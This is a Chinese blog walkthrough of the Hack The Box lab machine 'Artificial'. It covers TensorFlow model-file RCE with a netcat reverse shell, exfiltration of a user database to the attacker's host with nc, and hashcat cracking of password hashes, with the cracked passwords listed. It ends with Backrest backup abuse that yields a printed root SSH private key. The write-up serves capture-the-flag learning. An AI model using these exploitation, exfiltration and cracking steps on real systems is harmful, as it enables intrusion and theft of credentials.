HTB 赛季8靶场 - Artificial

已于 2025-06-30 17:00:46 修改
阅读量494 收藏 7
点赞数 5
CC 4.0 BY-SA版权
分类专栏: HTB 靶场 文章标签: 安全 web安全 网络安全
于 2025-06-30 16:48:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44368093/article/details/149026655

各位小伙伴们,最近我太忙啦,没有及时为和各位一起战斗,真实人生一大遗憾,我将速速补齐,请静候佳音!呜呜呜。

信息搜集扫描

在这里插入图片描述

首先进行nmap扫描

nmap -p- --min-rate 1000 -T4 10.10.11.74 -oA nmapfullscan -sV -sC

在这里插入图片描述

看到22和80端口情况,且我们不知道22端口版本,大概率只能从80端口尝试。
在这里插入图片描述

Tensorflow RCE 漏洞

修改host文件,重新访问网站

我们发现是个AI解决方案的公司介绍网站,其中有登录页面。让我们先创建和进入网站。
在这里插入图片描述

看到这里我们可以有两种操作,第一文件上传漏洞,第二AI投毒。我们看看这个上传接口是怎么个事儿。没有告诉我们上传点,可能走普通文件上传漏洞会有些困难。
![[Pasted image 20250630144356.png]]

所以我们尝试使用AI投毒,我们查看AI模型采用框架为tensorflow-cpu=2.13.1,这个tensorflow是存在问题,可能造成RCE(https://github.com/Splinter0/tensorflow-rce)

pip install -r requirements.txt

#修改文件payload
gedit exploit.py

#生成h5文件
python exploit.py

我们开启监听,上传h5文件

nc -lvnp 4444

在这里插入图片描述
![[Pasted image 20250630145313.png]]

Linux 通过Web网站的数据库提权

我们查看当前用户的信息,我们是app

$ cat /etc/passwd | grep /bin/bash
root:x:0:0:root:/root:/bin/bash
gael:x:1000:1000:gael:/home/gael:/bin/bash
app:x:1001:1001:,,,:/home/app:/bin/bash

我们快速使用linpeas.sh来进行信息收集,发现了users.db这个数据库文件,这将非常有价值。

nc -q 0 10.10.16.32 8888 < /home/app/app/instance/users.db

我们开始分析db文件,发现了用户的账密hash
![[Pasted image 20250630150655.png]]

我们快速提取所有hash

c99175974b6e192936d97224638a34f8
0f3d8c76530022670f1c6029eed09ccb
b606c5f5136170f15444251665638b36
bc25b1f80f544c0ab451c02a3dca9fc6
bf041041e57f1aff3be7ea1abd6129d0
63bd5fa08361af6493e9b5ddb0666752
53b76cc34444f5b08f9a0a333437e32d
cc03e747a6afbbcbf8be7668acfebee5
49f0bad299687c62334182178bfd75d8
50730021372f5c44900d4716451f3a49
0192023a7bbd73250516f069df18b500
32967804454ef7c6c18696b1df7116ec

开始离线破解获取账密

hashcat -a 0 -m 0 hash/sqlite3 /home/kali/Desktop/Info/zhuzhuzxia/Passwords/rockyou.txt 

53b76cc34444f5b08f9a0a333437e32d:sasasa                   
cc03e747a6afbbcbf8be7668acfebee5:test123                  
32967804454ef7c6c18696b1df7116ec:patryk                   
0192023a7bbd73250516f069df18b500:admin123                 
49f0bad299687c62334182178bfd75d8:sad                      
c99175974b6e192936d97224638a34f8:mattp005numbertwo        
bc25b1f80f544c0ab451c02a3dca9fc6:marwinnarak043414036  

gael/mattp005numbertwo

我们验证ssh登录

nxc ssh 10.10.11.74 -u gael -p mattp005numbertwo

![[Pasted image 20250630151224.png]]

窃取备份文件

我们登录gael

ssh gael@10.10.11.74

![[Pasted image 20250630151412.png]]

我们发现我们是sysadm用户,且该系统开放了5000和9898两个端口,这可能非常有趣,我们有权访问这个文件。

/var/backups/backrest_backup.tar.gz

在这里插入图片描述

backrest我再网上查了下,这是一个web网站备份解决方案,这可能意味着更高的权限。我们进入9898查看一下。先开启隧道

 ssh -L 9898:localhost:9898 gael@10.10.11.74 -fN

![[Pasted image 20250630160133.png]]

Hashcat破解密码

看来我们很需要这个密码,我们吸纳破解下密码,我们猜测是base64,先进行解密。

$2a$10$cVGIy9VMXQd0gM5ginCmjei2kZR/ACMMkSsspbRutYP58EBZz/0QO

接下来使用hashcat解密

hashcat -a 0 -m 3200 hash/backrest /home/kali/Desktop/Info/zhuzhuzxia/Passwords/rockyou.txt

![[Pasted image 20250630160751.png]]

backrest_root/!@#$%^

Backrest提权

生成备份仓

vFqe+5DT9shQIWfvvy8geMw4oQgBXs9VMo8UY6R7xoE7NVmW

![[Pasted image 20250630161502.png]]

生成plan
![[Pasted image 20250630162912.png]]

生成备份
![[Pasted image 20250630162949.png]]

然后下载生成的备份即可

-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

![[Pasted image 20250630163139.png]]

搞定!

HTB-Season8-Puppy-WriteUp
qq_58869808的博客
05-23 762
DPAPI、crack kdbx
HTB walkthrough -- Admirer
sinat_36853972的博客
07-14 644
HTB walkthrough – Admirer 0x01 信息收集 使用nmap扫描端口开放情况 dirb搜索到robots.txt 访问robots.txt,页面中提到一个文件夹/admin-dir 用wfuzz对这个文件进行扫描 得到contacts.txt 和 credentials.txt 看到有一个ftp用户,尝试ftp登录 登录成功,将dump.sql和html.tar.gz文件下载到本地 html.tar.gz解压后,分别有以下内容 index.php utility-scr
No matching distribution found for tensorflow-intel==2.13.1; platform_system == “Windows“ (from tens
asdjhsaf的博客
11-13 890
我对比了一下,同样是清华源的地址,两个url有点细微的区别。
HTB Artificial 靶场:从AI模型的RCE到NAS备份系统提权
PEIWIN的博客
06-23 1515
hackthebox 的 Artificial 靶机官方定义为简单难度,实际上你需要对 tensorflow、backrest备份等有初步的了解,否则可能一头雾水,一旦有了初步的认识,加上亿点点🤏搜索技巧,就可以轻松解决掉这个机器。
Linux/Artificial
ve9etable的博客
06-30 1298
在网上搜索发现,tensorflow是一个开源的机器学习框架,查看相关版本,也找不到什么利用的脚本,看大家的wp都指向下面的内容。用该用户和密码登录ssh,上传linpeas,在kali开启http,然后在靶场下载,并为其添加执行权限,然后运行。接着往下看发现了一个9898端口,这个端口非常奇怪,多半有干系,先不管,又看到一个可读备份文件。运行exp.py后会生成一个exploit.h5文件,监听端口,上传该文件。实在懒得等,在靶机中开启一个http,下载时发现要一个小时起步,算了,难搞。
HTB靶场】TIER-0-Redeemer
Madess的博客
05-20 934
HTB靶场】TIER-0-Redeemer靶机
HTB靶场 Shared
weixin_45682839的博客
08-22 2345
HTB靶场shared靶机通关攻略记录,涉及知识点包括:端口服务扫描、sql注入(cookie)、linux提权(ipython越权漏洞、redis逃逸漏洞)
HTB:在线主机-Worker
m0_46391769的博客
11-01 576
免责申明:本文仅作为学术讨论,请勿用作非法用途,如有本人概不负责。 关于本人:一名来自测绘行业的小白 HTB:在线主机-Worker 首先,基本操作来一套。 然后扔给nmap。 我们可以看到: port version 80 HTTP IIS 10.0 3690 SVNSERVER 5985 HTTPAPI 直接svn过来 svn checkout svn://10.129.32.87/ 这里解释一下,没有用过的朋友可以搜索一下svnserver获得详细的解释。我的这一条是
飞行控制领军者 | 边界智控携高安全级飞控系统亮相2025深圳eVTOL展
Spey_Events的博客
07-25 853
目前,边界智控在团队、产品、技术、业务及融资等各方面均实现了业内领先。2025 深圳eVTOL展的举办,为全球eVTOL产业链搭建了高规格、国际化的交流合作平台,全面多维地彰显了参展企业的卓越实力与行业引领地位,更为推动 eVTOL产业向高质量、规范化、规模化方向发展提供了有力支撑,对引领低空经济未来发展具有重要意义。作为eVTOL飞行控制领域的核心赋能者,边界科技将借此国际平台,全面展示其在核心技术领域的最新突破,与全球业界同仁深入交流前沿理念,共同探讨飞控系统对于推动eVTOL产业发展的核心驱动作用。
输电线路微气象在线监测装置:保障电网安全的科技屏障
WHFENGHE的博客
07-24 520
输电线路微气象在线监测装置通过集成高精度传感器和智能分析技术,实时监测线路环境参数(覆冰厚度、风速风向、温湿度等),具备IP67防护等级和-40℃至85℃工作范围。该装置采用太阳能+锂电池供电,支持4G/5G/北斗多模通信,能提前4-6小时预警覆冰等灾害,降低60%运维成本,适用于高海拔、沿海等复杂环境。未来将结合AI和无人机技术,实现更智能的电网安全管理。
多租户Kubernetes集群架构设计实践——隔离、安全与弹性扩缩容
qq_35716689的博客
07-27 828
深入探讨多租户Kubernetes集群的架构设计,涵盖命名空间隔离、网络安全策略、资源配额与弹性扩缩容实践,为企业级场景提供可落地方案。
2025年区块链安全威胁全景:新兴漏洞、攻击向量与防护策略深度解析
sheep8888的博客
07-24 909
威胁复杂度急剧上升2025年攻击平均复杂度达到8.7/10AI驱动攻击成为主要威胁向量跨协议攻击占比超过67%经济损失持续增长2024年总损失超过42亿美元单次攻击平均损失496万美元跨链桥攻击损失最为严重防护技术快速发展AI防御系统检测率达87%形式化验证应用率提升至67%多层防护架构成为标准行业协作日益重要安全信息共享成为常态标准化进程加速推进跨协议安全协调机制建立。
WEB安全--Java安全--Fastjson反序列化原理初探
m0_74800552的博客
07-26 792
这里的fastjson包版本为1.2.24,通过pom的方式即可导入可以看到在运行主类后,发现字符串被处理为json对象打印出来了当然也可以提取出json对象中的具体值。
2025年SDK游戏盾终极解析:重新定义手游安全的“隐形护甲”
最新发布
2403_86962125的博客
07-28 693
2025年全球手游市场规模突破$2000亿,黑客单次攻击成本却降至$30——某SLG游戏因协议层CC攻击单日流失37%玩家,某开放世界游戏遭低频DDoS瘫痪6小时损失千万。attackCheck: "RELAXED", // 宽松模式(高操作容忍):定位高频攻击IP段(如某棋牌游戏阻断越南IP后攻击↓90%):分析操作轨迹(如移动速度/技能冷却),识别外挂概率>92%:云端流量清洗,被动响应网络层攻击(如SYN Flood):客户端嵌入防护模块,主动拦截应用层威胁(外挂/协议篡改)
ZeroNews 推出端到端 TLS 终止功能,强化数据传输安全
2501_91573548的博客
07-28 754
TLS 终止能力,本质上是将数据“保险箱”的钥匙(私钥)完全交由您自己保管,ZeroNews 则专注于安全地“护送”这个已上锁的保险箱(通过加密隧道传输数据)。
CGA围手术期:全周期保障老年手术安全
khrh_18600903089的博客
07-28 769
对术中出血量较多的患者,依据术前贫血风险评估结果,选择合适的输血方式,减少输血不良反应。其核心价值在于以评估数据为依据,让每个环节的安全措施都精准对接患者需求,既保障手术顺利实施,又推动患者安全回归生活,为老年手术患者构建起坚实的安全屏障。老年患者手术安全涉及术前风险防控、术中精准管理、术后功能恢复等多个环节,CGA围手术期以系统性评估为核心,构建覆盖手术全周期的安全保障体系,通过“风险预判-动态调控-康复护航”的闭环管理,最大限度降低手术不良事件发生率,让老年患者在安全框架内获得最佳治疗效果。
工业控制系统安全之 Modbus 协议中间人攻击(MITM)分析与防范
这里是数字化与人工智能的 “实验场” 与 “瞭望台”
07-27 1089
Modbus 协议是一种应用层通信协议,由 Modicon 公司(现为施耐德电气)在 1979 年开发,主要用于工业自动化领域中设备之间的数据传输,尤其是可编程逻辑控制器(PLC)之间的通信。该协议具有简单、易实现、广泛应用等特点,并且是开放协议,兼容性强,支持多种物理层,包括串行通信(如 RS - 232/RS - 485)和以太网(Modbus TCP)。在 2022 年,某北美储能站发生了一起因 Modbus 协议中间人攻击导致的严重事故。
WEB安全--Java安全--fastjson1.2.24(JdbcRowSetImpl利用链)
m0_74800552的博客
07-28 437
我们通过@type指定系统类JdbcRowSetImpl,但是这个类并不存在命令执行的危险方法,所以要借助JNDI服务使JdbcRowSetImpl类中的lookup方法远程加载我们的恶意类来实现攻击。所以主要是利用JNDI注入达到的攻击。
Artificial
09-15
人工智能(Artificial Intelligence,AI)是一种模拟人类智能的科学和工程领。它主要涉及到计算机系统的开发,使其能够执行需要人类智能的任务。AI可以分为两种类型:狭义AI和通用AI(narrow AI,general AI)。狭义AI是指专注于特定任务的人工智能系统,例如语音识别、图像识别和自动驾驶等。而通用AI则是指具有与人类智能相当的多个领域的智能,能够处理各种任务和问题。通用AI还处于发展初期,目前还没有完全实现。人工智能的实现方式包括机器学习、深度学习和神经网络等技术。通过这些技术,计算机系统可以自动学习和改进,以提高其性能和准确性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值